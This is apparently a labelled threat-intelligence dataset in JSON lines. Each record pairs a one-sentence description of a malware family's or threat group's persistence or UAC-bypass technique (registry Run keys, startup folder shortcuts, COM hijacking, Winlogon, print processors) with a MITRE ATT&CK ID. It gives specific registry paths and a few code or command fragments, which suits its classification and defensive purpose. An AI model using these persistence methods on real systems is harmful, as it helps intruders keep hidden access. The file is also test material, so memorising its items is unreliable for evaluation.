{"text1":"ComRAT samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location \"HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32\".","labels":"['T1546.015']"}
|
|
{"text1":"KONNI has modified ComSysApp service to load the malicious DLL payload.","labels":"['T1546.015']"}
|
|
{"text1":"Mosquito uses COM hijacking as a method of persistence.","labels":"['T1546.015']"}
|
|
{"text1":"SILENTTRINITY can add a CLSID key for payload execution through `Registry.CurrentUser.CreateSubKey(\"Software\\\\Classes\\\\CLSID\\\\{\" + clsid + \"}\\\\InProcServer32\")`.","labels":"['T1546.015']"}
|
|
{"text1":"BoxCaon established persistence by setting the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" registry key to point to its executable.","labels":"['T1547']"}
|
|
{"text1":"Dtrack\u2019s RAT makes a persistent target file with auto execution on the host start.","labels":"['T1547']"}
|
|
{"text1":"LoudMiner can automatically launch at startup if the AutoStart option is enabled in the VBoxVmService configuration file.","labels":"['T1547']"}
|
|
{"text1":"Misdat has created registry keys for persistence, including `HKCU\\Software\\dnimtsoleht\\StubPath`, `HKCU\\Software\\snimtsOleht\\StubPath`, `HKCU\\Software\\Backtsaleht\\StubPath`, `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`.","labels":"['T1547']"}
|
|
{"text1":"xCaon has added persistence via the Registry key \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" which causes the malware to run each time any user logs in.","labels":"['T1547']"}
|
|
{"text1":"A Threat Group-3390 tool can add the binary\u2019s path to the Registry key \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" to add persistence.","labels":"['T1547.001']"}
|
|
{"text1":"A Turla Javascript backdoor added a local_update_check value under the Registry key \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" to establish persistence. Additionally, a Turla custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence.","labels":"['T1547.001']"}
|
|
{"text1":"A dropper used by Putter Panda installs itself into the ASEP Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" with a value named McUpdate.","labels":"['T1547.001']"}
|
|
{"text1":"A version of KONNI has dropped a Windows shortcut into the Startup folder to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"ADVSTORESHELL achieves persistence by adding itself to the \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" Registry key.","labels":"['T1547.001']"}
|
|
{"text1":"APT18 establishes persistence via the \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" key.","labels":"['T1547.001']"}
|
|
{"text1":"APT28 has deployed malware that has copied itself to the startup directory for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"APT29 added Registry Run keys to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"APT3 places scripts in the startup folder for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"APT32 established persistence using Registry Run keys, both to execute PowerShell and VBS scripts as well as to execute their backdoor directly.","labels":"['T1547.001']"}
|
|
{"text1":"APT33 has deployed a tool known as DarkComet to the Startup folder of a victim, and used Registry run keys to gain persistence.","labels":"['T1547.001']"}
|
|
{"text1":"APT37 has added persistence via the Registry key \"HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\\".","labels":"['T1547.001']"}
|
|
{"text1":"APT39 has maintained persistence using the startup folder.","labels":"['T1547.001']"}
|
|
{"text1":"APT41 created and modified startup files for persistence. APT41 added a registry key in \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" to establish persistence for Cobalt Strike.","labels":"['T1547.001']"}
|
|
{"text1":"Agent Tesla can add itself to the Registry as a startup program to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"An APT19 HTTP malware variant establishes persistence by setting the Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Debug Tools-%LOCALAPPDATA%\\\".","labels":"['T1547.001']"}
|
|
{"text1":"AppleSeed has the ability to create the Registry key name \"EstsoftAutoUpdate\" at \"HKCU\\Software\\Microsoft\/Windows\\CurrentVersion\\RunOnce\" to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Aria-body has established persistence via the Startup folder or Run Registry key.","labels":"['T1547.001']"}
|
|
{"text1":"Astaroth creates a startup item for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"AuTo Stealer can place malicious executables in a victim's AutoRun registry key or StartUp directory, depending on the AV product installed, to maintain persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Avaddon uses registry run keys for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"BACKSPACE achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.","labels":"['T1547.001', 'T1547.009']"}
|
|
{"text1":"BADNEWS installs a registry Run key to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"BBSRAT has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the Registry Run key location \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ssonsvr.exe\".","labels":"['T1547.001']"}
|
|
{"text1":"BRONZE BUTLER has used a batch script that adds a Registry Run key to establish malware persistence.","labels":"['T1547.001']"}
|
|
{"text1":"BabyShark has added a Registry key to ensure all future macros are enabled for Microsoft Word and Excel as well as for additional persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Backdoor.Oldrea adds Registry Run keys to achieve persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Bazar can create or add files to Registry Run Keys to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"BitPaymer has set the run key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"BoomBox can establish persistence by writing the Registry value \"MicroNativeCacheSvc\" to \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\".","labels":"['T1547.001']"}
|
|
{"text1":"Briba creates run key Registry entries pointing to malicious DLLs dropped to disk.","labels":"['T1547.001']"}
|
|
{"text1":"Cardinal RAT establishes Persistence by setting the \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load\" Registry key to point to its executable.","labels":"['T1547.001']"}
|
|
{"text1":"ChChes establishes persistence by adding a Registry Run key.","labels":"['T1547.001']"}
|
|
{"text1":"Chaes has added persistence via the Registry key \"software\\microsoft\\windows\\currentversion\\run\\microsoft windows html help\".","labels":"['T1547.001']"}
|
|
{"text1":"Clambling can establish persistence by adding a Registry run key.","labels":"['T1547.001']"}
|
|
{"text1":"Cobalt Group has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike.","labels":"['T1547.001']"}
|
|
{"text1":"Cobian RAT creates an autostart Registry key to ensure persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Conficker adds Registry Run keys to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Confucius has dropped malicious files into the startup folder `%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup` on a compromised host in order to maintain persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Crimson can add Registry run keys for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"CrossRAT uses run keys for persistence on Windows.","labels":"['T1547.001']"}
|
|
{"text1":"Dark Caracal's version of Bandook adds a registry key to \"HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Darkhotel has been known to establish persistence by adding programs to the Run Registry key.","labels":"['T1547.001']"}
|
|
{"text1":"DnsSystem can write itself to the Startup folder to gain persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Dragonfly has added the registry value ntdll to the Registry Run key to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"During Operation Sharpshooter, a first-stage downloader installed Rising Sun to `%Startup%\\mssync.exe` on a compromised host.","labels":"['T1547.001']"}
|
|
{"text1":"DustySky achieves persistence by creating a Registry entry in \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\".","labels":"['T1547.001']"}
|
|
{"text1":"EVILNUM can achieve persistence through the Registry Run key.","labels":"['T1547.001']"}
|
|
{"text1":"Emotet has been observed adding the downloaded payload to the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" key to maintain persistence.","labels":"['T1547.001']"}
|
|
{"text1":"EvilBunny has created Registry keys for persistence in \"[HKLM|HKCU]\\\u2026\\CurrentVersion\\Run\".","labels":"['T1547.001']"}
|
|
{"text1":"EvilGrab adds a Registry Run key for ctfmon.exe to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"FELIXROOT adds a shortcut file to the startup folder for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"FIN10 has established persistence by using the Registry option in PowerShell Empire to add a Run key.","labels":"['T1547.001']"}
|
|
{"text1":"FIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.","labels":"['T1547.001']"}
|
|
{"text1":"FLASHFLOOD achieves persistence by making an entry in the Registry's Run key.","labels":"['T1547.001']"}
|
|
{"text1":"FatDuke has used \"HKLM\\SOFTWARE\\Microsoft\\CurrentVersion\\Run\" to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"FinFisher establishes persistence by creating the Registry key \"HKCU\\Software\\Microsoft\\Windows\\Run\".","labels":"['T1547.001']"}
|
|
{"text1":"Final1stspy creates a Registry Run key to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"FunnyDream can use a Registry Run Key and the Startup folder to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"GRIFFON has used a persistence module that stores the implant inside the Registry, which executes at logon.","labels":"['T1547.001']"}
|
|
{"text1":"Gamaredon Group tools have registered Run keys in the registry to give malicious VBS files persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Gazer can establish persistence by creating a .lnk file in the Start menu.","labels":"['T1547.001']"}
|
|
{"text1":"Gelsemium can set persistence with a Registry run key.","labels":"['T1547.001']"}
|
|
{"text1":"Gold Dragon establishes persistence in the Startup folder.","labels":"['T1547.001']"}
|
|
{"text1":"Grandoreiro can use run keys and create link files in the startup folder for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"GrimAgent can set persistence with a Registry run key.","labels":"['T1547.001']"}
|
|
{"text1":"HTTPBrowser has established persistence by setting the \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" key value for \"wdm\" to the path of the executable. It has also used the Registry entry \"HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run vpdn \u201c%ALLUSERPROFILE%\\%APPDATA%\\vpdn\\VPDN_LU.exe\u201d\" to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Heyoka Backdoor can establish persistence with the auto start function including using the value `EverNoteTrayUService`.","labels":"['T1547.001']"}
|
|
{"text1":"Hi-Zor creates a Registry Run key to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Honeybee uses a batch file that configures the ComSysApp service to autostart in order to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Inception has maintained persistence by modifying Registry run key value \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\".","labels":"['T1547.001']"}
|
|
{"text1":"JCry has created payloads in the Startup directory to maintain persistence.","labels":"['T1547.001']"}
|
|
{"text1":"JHUHUGIT has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process.","labels":"['T1547.001']"}
|
|
{"text1":"KOCTOPUS can set the AutoRun Registry key with a PowerShell command.","labels":"['T1547.001']"}
|
|
{"text1":"Kasidet creates a Registry Run key to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Kazuar adds a sub-key under several Registry run keys.","labels":"['T1547.001']"}
|
|
{"text1":"Kimsuky has placed scripts in the startup folder for persistence and modified the `HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce` Registry key.","labels":"['T1547.001']"}
|
|
{"text1":"Koadic has added persistence to the `HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` Registry key.","labels":"['T1547.001']"}
|
|
{"text1":"Lazarus Group has maintained persistence by loading malicious code into a startup folder or by adding a Registry Run key.","labels":"['T1547.001']"}
|
|
{"text1":"LazyScripter has achieved persistence via writing a PowerShell script to the autorun registry key.","labels":"['T1547.001']"}
|
|
{"text1":"Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.","labels":"['T1547.001', 'T1547.009']"}
|
|
{"text1":"LoJax has modified the Registry key \"\u2018HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\BootExecute\u2019\" from \"\u2018autocheck autochk *\u2019\" to \"\u2018autocheck autoche *\u2019\" in order to execute its payload during Windows startup.","labels":"['T1547.001']"}
|
|
{"text1":"LookBack sets up a Registry Run key to establish a persistence mechanism.","labels":"['T1547.001']"}
|
|
{"text1":"Lucifer can persist by setting Registry key values \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\QQMusic\" and \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\QQMusic\".","labels":"['T1547.001']"}
|
|
{"text1":"MCMD can use Registry Run Keys for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Machete used the startup folder for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"MarkiRAT can drop its payload into the Startup directory to ensure it automatically runs when the compromised system is started.","labels":"['T1547.001']"}
|
|
{"text1":"Maze has created a file named \"startup_vrun.bat\" in the Startup folder of a virtual machine to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Mivast creates the following Registry entry: \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Micromedia\".","labels":"['T1547.001']"}
|
|
{"text1":"Mongall can establish persistence with the auto start function including using the value `EverNoteTrayUService`.","labels":"['T1547.001']"}
|
|
{"text1":"Mosquito establishes persistence under the Registry key \"HKCU\\Software\\Run auto_update\".","labels":"['T1547.001']"}
|
|
{"text1":"Most Sakula samples maintain persistence by setting the Registry Run key \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\" in the HKLM or HKCU hive, with the Registry value and file name varying by sample.","labels":"['T1547.001']"}
|
|
{"text1":"NOKKI has established persistence by writing the payload to the Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\".","labels":"['T1547.001']"}
|
|
{"text1":"Naikon has modified a victim's Windows Run registry to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"NanHaiShu modifies the %regrun% Registry to point itself to an autostart mechanism.","labels":"['T1547.001']"}
|
|
{"text1":"NavRAT creates a Registry key to ensure a file gets executed upon reboot in order to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"ObliqueRAT can gain persistence by creating a shortcut in the infected user's Startup directory.","labels":"['T1547.001']"}
|
|
{"text1":"Octopus achieved persistence by placing a malicious executable in the startup directory and has added the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" key to the Registry.","labels":"['T1547.001']"}
|
|
{"text1":"Okrum establishes persistence by creating a .lnk shortcut to itself in the Startup folder.","labels":"['T1547.001']"}
|
|
{"text1":"PLAINTEE gains persistence by adding the Registry key \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\".","labels":"['T1547.001']"}
|
|
{"text1":"POWERSOURCE achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access.","labels":"['T1547.001']"}
|
|
{"text1":"POWERTON can install a Registry Run key for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"PROMETHIUM has used Registry run keys to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"PUNCHBUGGY has been observed using a Registry Run key.","labels":"['T1547.001']"}
|
|
{"text1":"Patchwork has added the path of its second-stage malware to the startup folder to achieve persistence. One of its file stealers has also persisted by adding a Registry Run key.","labels":"['T1547.001']"}
|
|
{"text1":"PlugX adds Run key entries in the Registry to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"PoisonIvy creates run key Registry entries pointing to a malicious executable dropped to disk.","labels":"['T1547.001']"}
|
|
{"text1":"PowerShower sets up persistence with a Registry run key.","labels":"['T1547.001']"}
|
|
{"text1":"PowerSploit's \"New-UserPersistenceOption\" Persistence argument can be used to establish persistence via the \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" Registry key.","labels":"['T1547.001']"}
|
|
{"text1":"Prikormka adds itself to a Registry Run key with the name guidVGA or guidVSA.","labels":"['T1547.001']"}
|
|
{"text1":"Pteranodon copies itself to the Startup folder to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Pupy adds itself to the startup folder or adds itself to the Registry key \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"QakBot can maintain persistence by creating an auto-run Registry key.","labels":"['T1547.001']"}
|
|
{"text1":"RCSession has the ability to modify a Registry Run key to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"RTM has used Registry run keys to establish persistence for the RTM Trojan and other tools, such as a modified version of TeamViewer remote desktop software.","labels":"['T1547.001']"}
|
|
{"text1":"Ramsay has created Registry Run keys to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Reaver creates a shortcut file and saves it in a Startup folder to establish persistence.","labels":"['T1547.001', 'T1547.009']"}
|
|
{"text1":"RedLeaves attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys.","labels":"['T1547.001']"}
|
|
{"text1":"Remcos can add itself to the Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Remexi utilizes Run Registry keys in the HKLM hive as a persistence mechanism.","labels":"['T1547.001']"}
|
|
{"text1":"Revenge RAT creates a Registry key at \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\" to survive a system reboot.","labels":"['T1547.001']"}
|
|
{"text1":"Rifdoor has created a new registry entry at \"HKEY_CURRENT_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Graphics\" with a value of \"C:\\ProgramData\\Initech\\Initech.exe \/run\".","labels":"['T1547.001']"}
|
|
{"text1":"RunningRAT adds itself to the Registry key \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" to establish persistence upon reboot.","labels":"['T1547.001']"}
|
|
{"text1":"S-Type may create a .lnk file to itself that is saved in the Start menu folder. It may also create the Registry key \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ IMJPMIJ8.1{3 characters of Unique Identifier}\".","labels":"['T1547.001']"}
|
|
{"text1":"SHIPSHAPE achieves persistence by creating a shortcut in the Startup folder.","labels":"['T1547.001', 'T1547.009']"}
|
|
{"text1":"SILENTTRINITY can establish a LNK file in the startup folder for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"SNUGRIDE establishes persistence through a Registry Run key.","labels":"['T1547.001']"}
|
|
{"text1":"SPACESHIP achieves persistence by creating a shortcut in the current user's Startup folder.","labels":"['T1547.001', 'T1547.009']"}
|
|
{"text1":"STARWHALE can establish persistence by installing itself in the startup folder, whereas the GO variant has created a `HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookM` registry key.","labels":"['T1547.001']"}
|
|
{"text1":"Saint Bot has established persistence by being copied to the Startup directory or through the `\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` registry key.","labels":"['T1547.001']"}
|
|
{"text1":"SeaDuke is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory.","labels":"['T1547.001']"}
|
|
{"text1":"Seasalt creates a Registry entry to ensure infection after reboot under \"HKLM\\Software\\Microsoft\\Windows\\currentVersion\\Run\".","labels":"['T1547.001']"}
|
|
{"text1":"ServHelper may attempt to establish persistence via the \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\" run key.","labels":"['T1547.001']"}
|
|
{"text1":"Several Ke3chang backdoors achieved persistence by adding a Run key.","labels":"['T1547.001']"}
|
|
{"text1":"Sharpshooter's first-stage downloader installed Rising Sun to the startup folder \"%Startup%\\mssync.exe\".","labels":"['T1547.001']"}
|
|
{"text1":"Sidewinder has added paths to executables in the Registry to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Silence has used \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\", \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\", and the Startup folder to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Small Sieve has the ability to add itself to `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift` for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Smoke Loader adds a Registry Run key for persistence and adds a script in the Startup folder to deploy the payload.","labels":"['T1547.001']"}
|
|
{"text1":"Sykipot has been known to establish persistence by adding programs to the Run Registry key.","labels":"['T1547.001']"}
|
|
{"text1":"SysUpdate can use a Registry Run key to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"TINYTYPHON installs itself under Registry Run key to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"TeamTNT has added batch scripts to the startup folder.","labels":"['T1547.001']"}
|
|
{"text1":"The BlackEnergy 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.","labels":"['T1547.001', 'T1547.009']"}
|
|
{"text1":"TinyZBot can create a shortcut in the Windows startup folder for persistence.","labels":"['T1547.001', 'T1547.009']"}
|
|
{"text1":"TrickBot establishes persistence in the Startup folder.","labels":"['T1547.001']"}
|
|
{"text1":"Tropic Trooper has created shortcuts in the Startup folder to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Truvasys adds a Registry Run key to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Turian can establish persistence by adding Registry Run keys.","labels":"['T1547.001']"}
|
|
{"text1":"USBStealer registers itself under a Registry Run key with the name \"USB Disk Security.\"","labels":"['T1547.001']"}
|
|
{"text1":"VBShower used \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\" to maintain persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Variants of Emissary have added Run Registry keys to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"WarzoneRAT can add itself to the `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` and `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UIF2IS20VK` Registry keys.","labels":"['T1547.001']"}
|
|
{"text1":"Windshift has created LNK files in the Startup folder to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Winnti for Windows can add a service named \"wind0ws\" to the Registry to achieve persistence after reboot.","labels":"['T1547.001']"}
|
|
{"text1":"Xbash can create a Startup item for persistence if it determines it is on a Windows system.","labels":"['T1547.001']"}
|
|
{"text1":"ZIRCONIUM has created a Registry Run key named \"Dropbox Update Setup\" to establish persistence for a malicious Python binary.","labels":"['T1547.001']"}
|
|
{"text1":"Zebrocy creates an entry in a Registry Run key for the malware to execute on startup.","labels":"['T1547.001']"}
|
|
{"text1":"Zeus Panda adds persistence by creating Registry Run keys.","labels":"['T1547.001']"}
|
|
{"text1":"build_downer has the ability to add itself to the Registry Run key for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"gh0st RAT has added a Registry Run key to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"njRAT has added persistence via the Registry key \"HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\\" and dropped a shortcut in \"%STARTUP%\".","labels":"['T1547.001']"}
|
|
{"text1":"Bazar can use Winlogon Helper DLL to establish persistence.","labels":"['T1547.004']"}
|
|
{"text1":"Gazer can establish persistence by setting the value \u201cShell\u201d with \u201cexplorer.exe, %malware_pathfile%\u201d under the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\".","labels":"['T1547.004']"}
|
|
{"text1":"Remexi achieves persistence using Userinit by adding the Registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\".","labels":"['T1547.004']"}
|
|
{"text1":"Tropic Trooper has created the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\" and sets the value to establish persistence.","labels":"['T1547.004']"}
|
|
{"text1":"Turla established persistence by adding a Shell value under the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\".","labels":"['T1547.004']"}
|
|
{"text1":"Wizard Spider has established persistence using Userinit by adding the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon.","labels":"['T1547.004']"}
|
|
{"text1":"PowerSploit's \"Install-SSP\" Persistence module can be used to establish by installing a SSP DLL.","labels":"['T1547.005']"}
|
|
{"text1":"The Mimikatz credential dumper contains an implementation of an SSP.","labels":"['T1547.005']"}
|
|
{"text1":"Drovorub can use kernel modules to establish persistence.","labels":"['T1547.006']"}
|
|
{"text1":"During Operation CuckooBees, attackers used a signed kernel rootkit to establish additional persistence.","labels":"['T1547.006']"}
|
|
{"text1":"Skidmap has the ability to install several loadable kernel modules (LKMs) on infected machines.","labels":"['T1547.006']"}
|
|
{"text1":"Pasam establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk.","labels":"['T1547.008']"}
|
|
{"text1":"Wingbird drops a malicious file (sspisrv.dll) alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver. The payload of the malicious driver (located in its entry-point function) is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes.","labels":"['T1547.008']"}
|
|
{"text1":"APT29 drops a Windows shortcut file for execution.","labels":"['T1547.009']"}
|
|
{"text1":"Comnie establishes persistence via a .lnk file in the victim\u2019s startup path.","labels":"['T1547.009']"}
|
|
{"text1":"Dragonfly has manipulated .lnk files to gather user credentials in conjunction with Forced Authentication.","labels":"['T1547.009']"}
|
|
{"text1":"Empire can persist by modifying a .LNK file to include a backdoor.","labels":"['T1547.009']"}
|
|
{"text1":"Gazer can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.","labels":"['T1547.009']"}
|
|
{"text1":"Grandoreiro can write or modify browser shortcuts to enable launching of malicious browser extensions.","labels":"['T1547.009']"}
|
|
{"text1":"Helminth establishes persistence by creating a shortcut.","labels":"['T1547.009']"}
|
|
{"text1":"Kazuar adds a .lnk file to the Windows startup folder.","labels":"['T1547.009']"}
|
|
{"text1":"Lazarus Group malware has maintained persistence on a system by creating a LNK shortcut in the user\u2019s Startup folder.","labels":"['T1547.009']"}
|
|
{"text1":"MarkiRAT can modify the shortcut that launches Telegram by replacing its path with the malicious payload to launch with the legitimate executable.","labels":"['T1547.009']"}
|
|
{"text1":"Micropsia creates a shortcut to maintain persistence.","labels":"['T1547.009']"}
|
|
{"text1":"Okrum can establish persistence by creating a .lnk shortcut to itself in the Startup folder.","labels":"['T1547.009']"}
|
|
{"text1":"RedLeaves attempts to add a shortcut file in the Startup folder to achieve persistence.","labels":"['T1547.009']"}
|
|
{"text1":"RogueRobin establishes persistence by creating a shortcut (.LNK file) in the Windows startup folder to run a script each time the user logs in.","labels":"['T1547.009']"}
|
|
{"text1":"S-Type may create the file \"%HOMEPATH%\\Start Menu\\Programs\\Startup\\Realtek {Unique Identifier}.lnk\", which points to the malicious `msdtc.exe` file already created in the `%CommonFiles%` directory.","labels":"['T1547.009']"}
|
|
{"text1":"SeaDuke is capable of persisting via a .lnk file stored in the Startup directory.","labels":"['T1547.009']"}
|
|
{"text1":"Stuxnet used copies of .lnk shortcuts to propagate through removable media.","labels":"['T1547.009']"}
|
|
{"text1":"Earth Lusca has added the Registry key `HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows x64\\Print Processors\\UDPrint\u201d \/v Driver \/d \u201cspool.dll \/f` to load malware as a Print Processor.","labels":"['T1547.012']"}
|
|
{"text1":"Gelsemium can drop itself in \"C:\\Windows\\System32\\spool\\prtprocs\\x64\\winprint.dll\" to be loaded automatically by the spoolsv Windows service.","labels":"['T1547.012']"}
|
|
{"text1":"The PipeMon installer has modified the Registry key \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Print Processors\" to install PipeMon as a Print Processor.","labels":"['T1547.012']"}
|
|
{"text1":"Fysbis has installed itself as an autostart entry under \"~\/.config\/autostart\/dbus-inotifier.desktop\" to establish persistence.","labels":"['T1547.013']"}
|
|
{"text1":"NETWIRE can use XDG Autostart Entries to establish persistence.","labels":"['T1547.013']"}
|
|
{"text1":"PoisonIvy creates a Registry key in the Active Setup pointing to a malicious executable.","labels":"['T1547.014']"}
|
|
{"text1":"Dok uses AppleScript to install a login Item by sending Apple events to the \"System Events\" process.","labels":"['T1547.015']"}
|
|
{"text1":"NETWIRE can persist via startup options for Login items.","labels":"['T1547.015']"}
|
|
{"text1":"A Threat Group-3390 tool can use a public UAC bypass method to elevate privileges.","labels":"['T1548.002']"}
|
|
{"text1":"APT37 has a function in the initial dropper to bypass Windows UAC in order to execute the next payload with higher privileges.","labels":"['T1548.002']"}
|
|
{"text1":"An older variant of PLAINTEE performs UAC bypass.","labels":"['T1548.002']"}
|
|
{"text1":"AppleJeus has presented the user with a UAC prompt to elevate privileges while installing.","labels":"['T1548.002']"}
|
|
